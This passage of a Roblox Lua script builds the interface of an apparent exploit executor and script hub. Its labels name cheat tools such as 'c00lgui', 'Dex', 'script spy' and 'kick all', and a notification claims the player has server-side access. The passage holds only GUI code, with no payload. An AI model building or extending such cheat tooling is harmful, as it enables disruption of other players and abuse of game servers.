c00.Position = UDim2.new(0.8, 30, 0.0, 83)
c00.BackgroundColor3 = Color3.new(1, 1, 1)
c00.BorderColor3 = Color3.new(0, 0, 0)
c00.BorderSizePixel = 1
c00.Text = "c00lgui"
c00.BackgroundTransparency = 0 
c00.TextColor3 = Color3.new(0, 0, 0)
c00.Font = Enum.Font.SourceSans
c00.TextSize = 13
c00.Parent = pro

local game2 = Instance.new("TextLabel")
game2.Size = UDim2.new(0.0, 89, 0.0, 20)
game2.Position = UDim2.new(0.8, 30, 0.0, 104)
game2.BackgroundColor3 = Color3.new(1, 1, 1)
game2.BorderColor3 = Color3.new(0, 0, 0)
game2.BorderSizePixel = 1
game2.Text = "game cursor gui 2"
game2.BackgroundTransparency = 0 
game2.TextColor3 = Color3.new(0, 0, 0)
game2.Font = Enum.Font.SourceSans
game2.TextSize = 13
game2.Parent = pro

local dex = Instance.new("TextLabel")
dex.Size = UDim2.new(0.0, 89, 0.0, 20)
dex.Position = UDim2.new(0.8, 30, 0.0, 125)
dex.BackgroundColor3 = Color3.new(1, 1, 1)
dex.BorderColor3 = Color3.new(0, 0, 0)
dex.BorderSizePixel = 1
dex.Text = "Dex"
dex.BackgroundTransparency = 0 
dex.TextColor3 = Color3.new(0, 0, 0)
dex.Font = Enum.Font.SourceSans
dex.TextSize = 13
dex.Parent = pro

local hack = Instance.new("TextLabel")
hack.Size = UDim2.new(0.0, 89, 0.0, 20)
hack.Position = UDim2.new(0.8, 30, 0.0, 146)
hack.BackgroundColor3 = Color3.new(1, 1, 1)
hack.BorderColor3 = Color3.new(0, 0, 0)
hack.BorderSizePixel = 1
hack.Text = "hacker x"
hack.BackgroundTransparency = 0 
hack.TextColor3 = Color3.new(0, 0, 0)
hack.Font = Enum.Font.SourceSans
hack.TextSize = 13
hack.Parent = pro

local IY = Instance.new("TextLabel")
IY.Size = UDim2.new(0.0, 89, 0.0, 20)
IY.Position = UDim2.new(0.8, 30, 0.0, 167)
IY.BackgroundColor3 = Color3.new(1, 1, 1)
IY.BorderColor3 = Color3.new(0, 0, 0)
IY.BorderSizePixel = 1
IY.Text = "IY edited"
IY.BackgroundTransparency = 0 
IY.TextColor3 = Color3.new(0, 0, 0)
IY.Font = Enum.Font.SourceSans
IY.TextSize = 13
IY.Parent = pro

local kill = Instance.new("TextLabel")
kill.Size = UDim2.new(0.0, 89, 0.0, 20)
kill.Position = UDim2.new(0.8, 30, 0.0, 188)
kill.BackgroundColor3 = Color3.new(1, 1, 1)
kill.BorderColor3 = Color3.new(0, 0, 0)
kill.BorderSizePixel = 1
kill.Text = "kick all"
kill.BackgroundTransparency = 0 
kill.TextColor3 = Color3.new(0, 0, 0)
kill.Font = Enum.Font.SourceSans
kill.TextSize = 13
kill.Parent = pro

local scrip = Instance.new("TextLabel")
scrip.Size = UDim2.new(0.0, 89, 0.0, 20)
scrip.Position = UDim2.new(0.8, 30, 0.0, 209)
scrip.BackgroundColor3 = Color3.new(1, 1, 1)
scrip.BorderColor3 = Color3.new(0, 0, 0)
scrip.BorderSizePixel = 1
scrip.Text = "script spy"
scrip.BackgroundTransparency = 0 
scrip.TextColor3 = Color3.new(0, 0, 0)
scrip.Font = Enum.Font.SourceSans
scrip.TextSize = 13
scrip.Parent = pro

local c001 = Instance.new("TextLabel")
c001.Size = UDim2.new(0.0, 89, 0.0, 20)
c001.Position = UDim2.new(0.8, 30, 0.0, 230)
c001.BackgroundColor3 = Color3.new(1, 1, 1)
c001.BorderColor3 = Color3.new(0, 0, 0)
c001.BorderSizePixel = 1
c001.Text = "c00lgui v2"
c001.BackgroundTransparency = 0 
c001.TextColor3 = Color3.new(0, 0, 0)
c001.Font = Enum.Font.SourceSans
c001.TextSize = 13
c001.Parent = pro
end
end)

local kllp = Instance.new("UICorner")
kllp.CornerRadius = UDim.new(0, 5)
kllp.Parent = Exe

local clea = Instance.new("TextButton")
clea.Size = UDim2.new(0.3, 0, 0.7, 0)
clea.Position = UDim2.new(0.3, 19, 0.0, 9)
clea.BackgroundColor3 = Color3.new(0, 0, 0)
clea.BorderColor3 = Color3.new(0, 0, 0)
clea.BorderSizePixel = 0
clea.Text = "Clear"
clea.BackgroundTransparency = 0.8
clea.TextColor3 = Color3.new(255, 255, 255)
clea.TextSize = 19
clea.Parent = Mop
clea.MouseButton1Click:Connect(function()

end)

local kllp = Instance.new("UICorner")
kllp.CornerRadius = UDim.new(0, 5)
kllp.Parent = clea

local visk = Instance.new("Frame")
visk.Size = UDim2.new(0.0, 319, 0.0, 299)
visk.Position = UDim2.new(0.4, 0, 0.0, -19)
visk.BackgroundColor3 = Color3.new(1, 0, 1)
visk.BorderColor3 = Color3.new(0, 0, 0)
visk.BorderSizePixel = 0
visk.Active = true
visk.BackgroundTransparency = 1
visk.Draggable = true
visk.Visible = false
visk.Parent = gui

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = visk

local tk = Instance.new("Frame")
tk.Size = UDim2.new(0.9, 32, 0.0, 27)
tk.Position = UDim2.new(0.0, 0, 0.0, 0)
tk.BackgroundColor3 = Color3.new(0, 0, 0)
tk.BorderColor3 = Color3.new(0, 0, 0)
tk.BorderSizePixel = 0
tk.Active = false
tk.BackgroundTransparency = 0
tk.Draggable = true
tk.Parent = visk

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = tk

local tjb = Instance.new("Frame")
tjb.Size = UDim2.new(0.9, 31, 0.9, 3)
tjb.Position = UDim2.new(0.0, 0, 0.0, 0)
tjb.BackgroundColor3 = Color3.new(1, 1, 1)
tjb.BorderColor3 = Color3.new(0, 0, 0)
tjb.BorderSizePixel = 0
tjb.Active = false
tjb.BackgroundTransparency = 0.7
tjb.Draggable = true
tjb.Parent = tk

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = tjb

local whitelo = Instance.new("Frame")
whitelo.Size = UDim2.new(0.9, 31, 0.0, 1)
whitelo.Position = UDim2.new(0.0, 0, 0.9, 1)
whitelo.BackgroundColor3 = Color3.new(1, 1, 1)
whitelo.BorderColor3 = Color3.new(0, 0, 0)
whitelo.BorderSizePixel = 0
whitelo.Active = false
whitelo.BackgroundTransparency = 0 
whitelo.Draggable = true
whitelo.Parent = tjb

local blacko = Instance.new("Frame")
blacko.Size = UDim2.new(0.9, 32, 0.8, 33)
blacko.Position = UDim2.new(0.0, 0, 0.0, 27)
blacko.BackgroundColor3 = Color3.new(0, 0, 0)
blacko.BorderColor3 = Color3.new(0, 0, 0)
blacko.BorderSizePixel = 0
blacko.Active = false
blacko.BackgroundTransparency = 0 
blacko.Draggable = true
blacko.Parent = visk

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = blacko

local kn = Instance.new("Frame")
kn.Size = UDim2.new(0.9, 32, 0.9, 27)
kn.Position = UDim2.new(0.0, 0, 0.0, 0)
kn.BackgroundColor3 = Color3.new(1, 1, 1)
kn.BorderColor3 = Color3.new(0, 0, 0)
kn.BorderSizePixel = 0
kn.Active = false
kn.BackgroundTransparency = 0.8
kn.Draggable = true
kn.Parent = blacko

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = kn

local nms = Instance.new("TextLabel")
nms.Size = UDim2.new(0.5, 49, 0.0, 27)
nms.Position = UDim2.new(0.0, 0, 0.0, 0)
nms.BackgroundColor3 = Color3.new(0, 0, 0)
nms.BorderColor3 = Color3.new(0, 0, 0)
nms.BorderSizePixel = 0
nms.Text = "scriptshub coming soon"
nms.BackgroundTransparency = 1
nms.TextColor3 = Color3.new(255, 255, 255)
nms.TextSize = 14
nms.Parent = visk

local blur = Instance.new("Frame")
blur.Size = UDim2.new(0.9, 150, 0.9, 150)
blur.Position = UDim2.new(0.0, 0, 0.0, -59)
blur.BackgroundColor3 = Color3.new(1, 1, 1)
blur.BorderColor3 = Color3.new(0, 0, 0)
blur.BorderSizePixel = 0
blur.Active = false
blur.BackgroundTransparency = 1
blur.Draggable = true
blur.Parent = gui

local Command = Instance.new("Frame")
Command.Size = UDim2.new(0.0, 399, 0.0, 35)
Command.Position = UDim2.new(0.3, -39, 0.0, -99)
Command.BackgroundColor3 = Color3.new(0, 0, 0)
Command.BorderColor3 = Color3.new(0, 0, 0)
Command.BorderSizePixel = 0
Command.Active = false
Command.BackgroundTransparency = 0 
Command.Draggable = true
Command.Parent = gui

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 9)
UICorner.Parent = Command

local Uin = Instance.new("Frame")
Uin.Size = UDim2.new(0.9, 39, 0.9, 3)
Uin.Position = UDim2.new(0.0, 0, 0.0, 0)
Uin.BackgroundColor3 = Color3.new(1, 1, 1)
Uin.BorderColor3 = Color3.new(0, 0, 0)
Uin.BorderSizePixel = 0
Uin.Active = false
Uin.BackgroundTransparency = 0.9
Uin.Draggable = true
Uin.Parent = Command

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 9)
UICorner.Parent = Uin

local Button = Instance.new("ImageButton")
Button.Size = UDim2.new(0.0, 27, 0.0, 27)
Button.Position = UDim2.new(0.0, 5, 0.0, 3)
Button.BackgroundColor3 = Color3.new(0, 0, 0)
Button.ImageColor3 = Color3.new(1, 1, 1)
Button.Image = "rbxassetid://129784581703540"
Button.ImageTransparency = 0.4
Button.Parent = Command

Button.BackgroundTransparency = 1

local comm = Instance.new("TextBox")
comm.Size = UDim2.new(0.8, 19, 0.9, 3)
comm.Position = UDim2.new(0.0, 39, 0.0, 0)
comm.BackgroundColor3 = Color3.new(0, 0, 0)
comm.BorderColor3 = Color3.new(0, 0, 0)
comm.BorderSizePixel = 0
comm.Text = ""
comm.PlaceholderText = "search"
comm.TextColor3 = Color3.new(1, 1, 1)
comm.BackgroundTransparency = 1
comm.Font = Enum.Font.Code
comm.TextSize = 19
comm.Parent = Command
comm.TextXAlignment = Enum.TextXAlignment.Left

local opln = Instance.new("UIStroke")
opln.Color = Color3.new(1, 1, 1)
opln.Thickness = 0.4
opln.Parent = Command

local LPlayer = game.Players.LocalPlayer

LPlayer.Chatted:Connect(function(cht)
if cht:match("open cmds") then
Command:TweenPosition(UDim2.new(0.3, -39, 0.3, 19), "Out", "Linear", 0.5, false)
wait(0.001)
blur.BackgroundTransparency = 1
wait(0.001)
blur.BackgroundTransparency = 0.9
wait(0.001)
blur.BackgroundTransparency = 0.8
wait(0.001)
blur.BackgroundTransparency = 0.7
end

if cht:match("close cmds") then
Command:TweenPosition(UDim2.new(0.3, -39, 0.0, -99), "Out", "Linear", 0.5, false)
wait(0.001)
blur.BackgroundTransparency = 0.7
wait(0.001)
blur.BackgroundTransparency = 0.8
wait(0.001)
blur.BackgroundTransparency = 0.9
wait(0.001)
blur.BackgroundTransparency = 1
end
end)

Button.MouseButton1Click:Connect(function()
local comm = comm.Text
    if comm == "executor" then
Main.Visible = true
end

if comm == "close executor" then
Main.Visible = false
end

if comm == "close all" then
visk.Visible = false
Main.Visible = false
end

if comm == "scriptshub" then
visk.Visible = true
end

if comm == "close scriptshub" then
visk.Visible = false
end

end)

local notifikasi = Instance.new("Frame")
notifikasi.Size = UDim2.new(0.0, 259, 0.0, 159)
notifikasi.Position = UDim2.new(0.9, 99, 0.6, -56)
notifikasi.BackgroundColor3 = Color3.new(0, 0, 0)
notifikasi.BorderColor3 = Color3.new(0, 0, 0)
notifikasi.BorderSizePixel = 0
notifikasi.Active = false
notifikasi.BackgroundTransparency = 0 
notifikasi.Draggable = true
notifikasi.Parent = gui

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 9)
UICorner.Parent = notifikasi

local lnl = Instance.new("UIStroke")
lnl.Color = Color3.new(0, 0, 0)
lnl.Thickness = 2
lnl.Parent = notifikasi

local oti = Instance.new("Frame")
oti.Size = UDim2.new(0.9, 26, 0.9, 16)
oti.Position = UDim2.new(0.0, 0, 0.0, 0)
oti.BackgroundColor3 = Color3.new(1, 1, 1)
oti.BorderColor3 = Color3.new(0, 0, 0)
oti.BorderSizePixel = 0
oti.Active = false
oti.BackgroundTransparency = 0.8
oti.Draggable = true
oti.Parent = notifikasi

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 9)
UICorner.Parent = oti

local profil = Instance.new("ImageLabel")
profil.Size = UDim2.new(0.0, 65, 0.0, 65)
profil.Position = UDim2.new(0.0, 4, 0.0, 4)
profil.BackgroundColor3 = Color3.new(0, 0, 0)
profil.ImageColor3 = Color3.new(1, 1, 1)
profil.Image = "rbxassetid://0"
profil.ImageTransparency = 0
profil.Parent = notifikasi 

profil.BackgroundTransparency = 1

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 9)
UICorner.Parent = profil

local knk = Instance.new("UIStroke")
knk.Color = Color3.new(0, 0, 0)
knk.Thickness = 0.8
knk.Parent = profil

local speak = Instance.new("TextLabel")
speak.Size = UDim2.new(0.9, 25, 0.5, 0)
speak.Position = UDim2.new(0.0, 0, 0.5, 0)
speak.BackgroundColor3 = Color3.new(0, 0, 0)
speak.BorderColor3 = Color3.new(0, 0, 0)
speak.BorderSizePixel = 1
speak.Text = "hello "..game.Players.LocalPlayer.Name.." now you whitelist on project secret. is game has get serverside"
speak.BackgroundTransparency = 1
speak.TextColor3 = Color3.new(255, 255, 255)
speak.Font = Enum.Font.Code
speak.Parent = notifikasi
speak.TextSize = 19
speak.TextWrapped = true

---script

notifikasi:TweenPosition(UDim2.new(0.5, 99, 0.6, -56),"Out","Quad")
profil.Image = game.Players:GetUserThumbnailAsync(game.Players.LocalPlayer.UserId,Enum.ThumbnailType.HeadShot,Enum.ThumbnailSize.Size420x420)
wait(5)
notifikasi:TweenPosition(UDim2.new(0.9, 99, 0.6, -56),"Out","Quad")